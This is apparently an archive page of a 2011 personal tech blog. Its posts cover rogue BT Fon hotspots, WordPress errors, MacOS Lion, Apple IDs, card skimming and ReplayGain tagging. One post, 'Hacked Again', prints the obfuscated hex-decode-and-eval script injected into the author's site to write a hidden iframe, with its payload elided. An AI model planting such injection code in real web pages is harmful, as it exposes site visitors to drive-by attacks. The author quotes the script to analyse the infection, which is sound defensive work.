Archive for the ‘Technical’ Category

TapBT Wi-Fi users beware

1 Nov 2011 14:34 by Rick

The BT broadband offering has a popular feature which allows you to access the internet from your mobile devices even when away from home. When everyone installs their Wi-Fi routers the process simultaneously sets up another Wi-Fi SSID called “BT Fon” (or sometimes “BT Openzone”, and I have seen both at once). With agreement (I think) these are configured so any BT user can sign in to them using their home account details and gain access to the internet via your connection. For privacy, identity and accounting this is kept entirely separate from the home owner’s connection and the only cost to them is a possible bandwidth reduction caused by the extra load. In practice this is a small price to pay for the ability of friends and relations to gain internet access without knowing your security code. You may get a few passers by briefly tapping your connection but they are not going to do it persistently because they have to be BT broadband customers themselves which they are paying for. It may be more of a problem if you live next to a park or café but not too serious.

This all sounds good—you are providing a service for others and in return they provide a service to you when you need it. There are millions of customers and hence millions of potential free Wi-Fi hotspots for you to use. There is security, in the form of an account and password, to verify identity which protects BT’s and the home owner’s interests.

What there is not is any security to protect the mobile user. The catch is that the Wi-Fi hot spot is only identified by it’s name (“BT Fon” or “BT Openzone”)—but anyone can create an SSID called that! So you don’t know if you are connecting to a real BT service or a fake one. This is true with any Wi-Fi hotspot of course, but much more insidious for these because of their ubiquity. There is a sign on process the first time you use one (and even that can be faked) but it is not required for subsequent connections as it is done automatically. For smart phone users it is potentially even more serious. As is pointed out in this Guardian article from April, phones sometimes connect even while in your pocket. O2 iPhones are configured to do this by default because of a partnership between O2 and BT.

BT have known about this problem for some time but have so far declined to do anything about it or even let anyone know. This is disappointing considering that their security team is one of the most respected in the industry.

TapEternal Flame

6 Oct 2011 16:03 by Rick

Eternal FlameThanks to XKCD.

Tap“PHP Fatal error: Call to undefined function get_header()” error in WordPress

25 Sep 2011 17:27 by Rick

I am getting occasional (3-4 a month) errors in a log file on the various WordPress installations that I support. The full text is

[25-Sep-2011 09:02:01] PHP Fatal error: Call to undefined function get_header() in /home/<ACCOUNT>/public_html/wp-content/themes/<THEME NAME>/index.php on line 1

Doing the natural thing I Googled for a reason but didn’t find much that was informative. Most of the cases reported were where the user had stupidly inadvertently overwritten the root index.php with the one from their theme of the day. The best I found was ardemis who is one step ahead of me.

As he implies, at important step is to stop the message reaching the user’s browser because it reveals rather too much about your web server. This is done by including the call

ini_set('display_errors', 0);

before the get_header();. This makes the message ONLY appear in the log file, which incidentally, can be found in the theme directory. He then goes on to describe a more sophisticated approach which you can read there if it suits your site. But why are they occurring? Is it search engine spiders or hackers probing the depths of your site.

TapArguments for and against installing MacOS Lion

22 Aug 2011 09:45 by Rick

I had trouble identifying any compelling reason to install the latest version of the Apple Mac OS version nicknamed “Lion” so resorted to reading all the reviews and listing the points. It may come down to going to a store and trying it out.


Stuff that is likely to work and I would actually use.

  • The usual security and currency stuff.
  • Creation of instant folders for selected content.
  • Filevault2 encryption.
  • Mission Control (Exposé + Spaces).
  • Accented character picker.
  • Resize windows from any corner.
  • Enhancements to Preview application.
  • Signatures to PDFs (if it works with third party cameras).
  • It is cheap.


Either things I am not interested in or don’t have the hardware to support.

  • Full-screen applications now integrated and standard. With large monitors full-screen is often a waste of space.
  • Icons are now monochrome. Probably harder to see but no big deal.
  • Launchpad—I put the Applications folder on the Dock.
  • Autosave and version control (some applications). I am not sure about this one, I don’t think I use any applications that support it.
  • Added 9 Sept: Autosave and version control only work to HFS+ formatted drives, not NAS.
  • Resume (some) applications where you left off.
  • Multi-touch gestures (I have no touch pad—should I get one?).
  • AirDrop (Mac Pro has no built in wi-fi so it won’t work).
  • Reversal of scrolling. I’ll get used to it.
  • Facetime (reported no support for third party cameras).
  • Some gestures not supported on magic mouse.
  • (Reported) side swipes are inconsistent.
  • Loss of Rosetta. I never used it.
  • Mail and Calendar enhancements (I don’t use them).
  • Added 9 Sept: Loss of Front Row (thanks Dozer).


Stuff that will hinder me.

  • Loss of grid arrangement of spaces (now desktops). I race around spaces at speed using Ctrl-Arrows.
  • Desktops don’t wrap around end to start as you cycle through them.
  • Desktops are not identifiable except by content.
  • Going full screen creates a new desktop in the list.
  • Inconsistencies with dual monitor support such as full screen.
  • (Reported) difficulty using copy/paste between desktops.
  • Auto-termination of applications which are not being used.
  • Wake on mouse “wiggle” disabled (not sure if this is just for system sleep or monitor sleep as well).
  • Added 9 Sept: Loss of connection to some NAS devices (thanks Dozer). I am informed by Netgear that my ReadyNAS duo should be ok. Not sure about my LinkSys NSLU2.

At the moment the big blocker is a critical application has not yet been ported but that should be ready in a few weeks finding the time. Then…is it worth it?

TapConfused by Apple ID

6 Jul 2011 13:25 by Rick

To operate Apple equipment effectively you need an Apple ID—but the whole process is very confusing. You can login to your account in at least three places:—

They all require the same id and password but each one gives you different information and there doesn’t seem to be any way to manage the account from one place or even to move from one to the other.

But I am also confused about the concept. Are we expected to have one ID (account) each or one per family? If the former then I can’t see how we can take advantage of the offer on the app store to purchase things once and install them on multiple devices. We were better off under the old family-pack idea. What happens if some of the machines (e.g. an iMac) have multiple users who also have personal devices?

If, on the other hand, we are expected to have one per family then what happens when the kids move out (or more extreme cases like divorce)—how can they take their music and apps with them?

What if you buy/inherit second hand equipment; can you transfer the registration? And what happens if you inherit music/apps—after all they would be regarded as an asset on the estate? Or if you marry? I am reading that Apple will not merge accounts.

Does any of this really matter?

Update: 10 August. Some notice is being taken of this problem. A new development is that an Apple ID can only be associated with 10 devices (including computers) at any one time and there must be a 90 day moratorium between switching of Apple IDs on any device.

Update: 8 Sept. Another well though through commentary.

TapHacked Again

16 Jun 2011 10:01 by Rick

Since the problem in 2007 my web sites have been running pretty smoothly. I never did get to the bottom of what caused it but the suspicion was an out of date WordPress install which had some sort of vulnerability.

This month it happened again. I first spotted it on 6 Jun when I saw a big iFrame appear below the page footer of this blog. Again there was a suspicion of a down-level WordPress but it was only one dot point off current. Never-the-less, I updated and the problem went away by wiping out the infected files. In fact, I did it so fast that I didn’t have time to investigate fully.

A week later, the problem was back and now, because I was fully up to date, I had to look more closely.

The code inserted was

[script]var t="";var arr="...";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);[/script]

which decodes to execute

document.write('[iframe src="" width="1" height="1" frameborder="0"][/iframe]')

The hacked code was tacked on the end of module wp-blog-header.php so it is clear that the infection understands WordPress. Later I was informed by a regular visitor, that some other (static) pages on the site were also infected. One drawback of running a browser with full protection like Firefox with NoScript is that you can’t easily spot things like this when they occur. Anyway, I spent an hour yesterday evening clearing up the rest of the site. It had infected almost all files called index.htm and home.htm and one or two others with a high page rank due to a lot of external referrers. The inserted code was after <body> and was either identical or very similar to the above (just a change of target web page).

So it is clear that the infection mechanism is clever, I just wish I know what it was. I am no longer convinced that it is anything to do with WordPress – a ZeroDay vulnerability like this would have been reported by now and, at the time of writing I can find no other internet reference to this particular infection. There is no other active content on the site so that leaves the possibility of either a cracked password (all of which are strong and recently changed) or a compromised host server.

TapCard Skimming

28 May 2011 07:59 by Rick

Yesterday I had my credit card skimmed in a luxury goods shop in Cabot Circus. Credit card skimming is the process used by dodgy waiters and the like to steal the details off your card for use on the black market. It is often done using a small device concealed in the palm of their hand which reads the mag stripe while walking back to the till. This scam is, in fact, dying out as there are much easier ways for the criminals to get numbers in bulk, but it still used by small time crooks.

So, what happened in the shop? They had a skimmer attached to the front of the till – I should point out here that the action of the assistant was not criminal and, I will presume that the retail chain is not either. But they are foolish. Their system requires the credit card number before it will print a receipts. The PDQ chip-and-pin terminal they use for payment is not connected to the till system, and for good reason. They have no legitimate reason to collect and store the credit card numbers. In fact, I can’t imagine what they do with them. If there is a query over the payment (if the card subsequently turns out to be stolen for instance) then the merchant account provider, the people who process the transaction, have all the information necessary to pursue the case.

Larger retailers like supermarkets do have their systems connected together. They are operating as their own merchant provider and communicate directly with the credit card companies but they are then required to meet much more stringent security requirements on their whole system.

So if you see this happening – complain. I only noticed because the mag stripe on my card is faulty (it “accidentally” got too close to a strong magnet) and they had to type the number in by hand. It is also worth while noting the three digit number on the back of your card and then covering it up with a sticker. That will hinder online fraud.

I will report back here if the managing director of the chain concerned replies.

TapNeoOffice is no longer free

20 Apr 2011 10:45 by Rick

NeoOffice is a fork of the well known office suite customised for Mac OS X. When it was created there was no Mac version of OpenOffice and even when I started three years ago, the Mac support for OpenOffice was very poor. There have always been licence anomalies between the two versions—OpenOffice is LGPL and requires a copyright assignment for contributions to the main code. NeoOffice were not prepared to do this so their code is licensed under full GPL and is not retrofitted.

Up until now, it has always been free at source with a recommendation/plea for donations to support the work, which I have done at least once. Now, since Version 3.2, the “donation” is mandatory—you can’t download the code unless you have donated at least $10US within the last year.

Times have changed—it now requires Mac OS X 10.5+ and Intel hardware which must kill off a sizeable proportion of their customer base. Also OpenOffice and now LibreOffice are much more capable. Finally, if you must pay for it, the iWorks components are much more affordable and also offer cross format capabilities.

TapHow incompetent can a software company be

10 Feb 2011 09:15 by Rick

I mean, of course, Adobe. I have written before about the hoops you need to go through to get copies of their critical security upgrades for the Flash products. Now they have cut off one of the little ruses I used so that it is now no longer possible to download the upgrade for Internet Explorer. All you get is flashax.exe, which is self deleting as soon as you run it (how stupid is that) and only runs an “Adobe Installation Helper” which downloads and runs the real product. Not a lot of help if you are not connected to the internet at the time. One of my systems will not be upgraded this time around because it can’t due to a firewall—perhaps I should sue for consequent damage when it gets infected.

Now all this fiddling about would perhaps make sense if the product was hundreds of MB and a download needed to continue if interrupted. But it is 2.7MB and takes a few seconds to download and a few more to install. What we want is an upgrade that we can download and save to run later and one that does all situations in one go – not separate for IE and other browsers.

[12 Feb—they’ve fixed it now]

TapVolume Levelling and Replay Gain

4 Feb 2011 13:38 by Rick

Ever since recording began there has always been the problem of varying volume levels—with a big horn gramophone you sat closer, with record players you kept getting up to adjust the volume. Sometimes this was the fault of lazy recording engineers but often it was inherent in the media; the peaks had to be limited to avoid clipping (or worse on vinyl) whilst still maintaining a respectable amplitude bandwidth. With digital media there should have been a solution at source. The bandwidth stretches below the threshold of hearing but recordings are usually made with the peak just a few dB off the maximum. The impact of this is that recordings with a wide dynamic range such as acoustic and classical music sound very quiet when compared to highly compressed pop music (compressing pop is an issue for another time).

DJs learn to “ride the fader” to keep the apparent volume steady over a session. At home we have to resort to the remote, but there is a solution with media that you have control over—or at least there should be. Digital formats such as MP3, WMA, Flac and AAC have developed mechanisms to adjust the decoder output to a user defined level. A good description of the technique is described on the MediaMonkey FAQ pages (scroll down to the last chapter).

The three different methods are

1. Recode the audio to the level you require; this is potentially destructive as information (and hence quality) is lost each time you do it and it is not reversible so few systems employ this method.

2. Code the reference level on each audio frame so that standard decoders can interpret them. This is the method used by MP3gain and MediaMonkey “Level Playback Volume” and is the most universally successful. However there is some doubt over whether it is truly reversible without loss. It is also not possible with files protected by rights management (DRM).

3. Code the adjustment required in the metadata without touching the audio stream. This truly does not lose any information but requires support from the player to interpret the tags. It is supported, amongst others by WMP “Volume Levelling”, MediaMonkey “Analyze Volume” and iTunes “Sound Check” and by players to varying degrees.

The way they all calculate what adjustment to make goes by the grand name of Psychoacoustic Analysis to judge how loud the listener perceives the music to be. The two ways to do this are by track, what used to be called “Radio Levelling” and is what you would want if you were a DJ or playing a party mix; and by album which used to be called “Audiophile Levelling.” This preserves the relative volume of the tracks on an album to respect the artist/engineer’s requirements and is what you would want if listening to a symphony with each movement as a separate track.

The problem

The definition of many of the metadata tags for method 3 are not standardised, particularly for the most common format—MP3. Different encoders do it in different ways which means that players have to decide which, if any they support. This is partly as a consequence of multiple independent tagging systems.

Replay Gain

The first format to adopt what it called Replay Gain was Flac (Ogg Vorbis) and that is (nearly) standardised using the tags REPLAYGAIN_TRACK_PEAK, REPLAYGAIN_TRACK_GAIN & REPLAYGAIN_ALBUM_GAIN. There is also a REPLAYGAIN_ALBUM_PEAK which most encoders ignore. The loose point in the standard is that it specifies a reference volume of 83dB above the threshold of hearing whereas everyone now accepts (and implements) 89dB as a better level to avoid stretching the analogue amplification too far. The technical description for the standard proposed is

…the ReplayGain tags stored in the files are 6dB above the gain adjustments required to make the files “sound as loud” as a -20dB RMS pink noise signal when replayed in an SMPTE RP 200 calibrated system. The -20dB RMS pink noise signal will measure 83dB [89dB] SPL at the listener’s seat in such a system.

Encoder/Taggers such as MediaMonkey also use these as sub-tags of the TXXX {user defined text information} ID3v2 tag in MP3 files. They have the advantage that they are easy to read.

Windows Media Player

It is predictable that the proprietary organisations should do it differently. “Volume Levelling” has a system for its own WMA format using PeakValue and AverageLevel tags (these are “track gain” only) which it also uses to code MP3 files as sub-tags of the PRIV {Private} ID3v2 tag. It is coded in binary. I have seen reported elsewhere on the internet that WMP uses WM/WMADRCAverageReference, WM/WMADRCPeakReference, WM/WMADRCAverageTarget, and WM/WMADRCPeakTarget tags but I can’t find evidence for this in my files. What ever it does, WMP does it very slowly just like its collection of other meta data.

Apple iTunes

“Sound Check” is different again. I can’t analyse AAC files as I can’t find a structure definition document but for MP3 files it writes an iTunNORM sub-tag of the COMM {Comment} ID3v2 tag. There are 40 bytes of binary data in there but what they mean I haven’t discovered.


Surprisingly, this very popular public domain encoder also uses a unique system called the MP3 INFO tag. Replay Gain uses bytes 167-174 (not 175 as the documentation says) of the tag coded in binary—Track Peak Amplitude (4 bytes floating point), Track Gain (2 bytes), Album Gain (2 bytes). The format of the latter two is as follows—3 bits; type code, 000=Not Set, 001=Track, 010=Album. 3 bits originator code; 000=Unspecified, 001=set by producer, 010=set by user, 011=calculated automatically. 1 bit: sign. 9 bits; value * 10.


As well as the Vorbis type tags, MediaMonkey also writes an MP3 ID3v2 tag called RGAD {Replay gain adjustment} with 8 bytes of data supporting both track and album gain and I think there was some intention to get this standardised but I see no sign of it. The format (inside the tag) is the same as the LAME data described above.

What now

My immediate requirement is for my Sonos system to play at the correct volume. Sonos supports WMP tags for WMA & MP3, iTunes tags for AAC & MP3 and the standard tags in Flac files. It only supports “track gain” (and, as I have discovered by experiment, only supports negative values, so it will lower the volume but not raise it). What I require is “album gain” on Flac and MP3 files not written by the proprietary systems. What I need is a method to write either iTunes or WMP type tags based on the MediaMonkey ones. As a start I am working on a MediaMonkey plugin that first saves the “track gain” in a custom field for safety then copies the “volume gain” to the “track gain” field to fool the player into supporting audiophile mode. To do the rest of the job I will need to discover what the binary means in the WMP or iTunes tags.

[Edited 4 Jan 2012] to add information obtained from ReplayGain legacy metadata formats (with thanks).

^ Top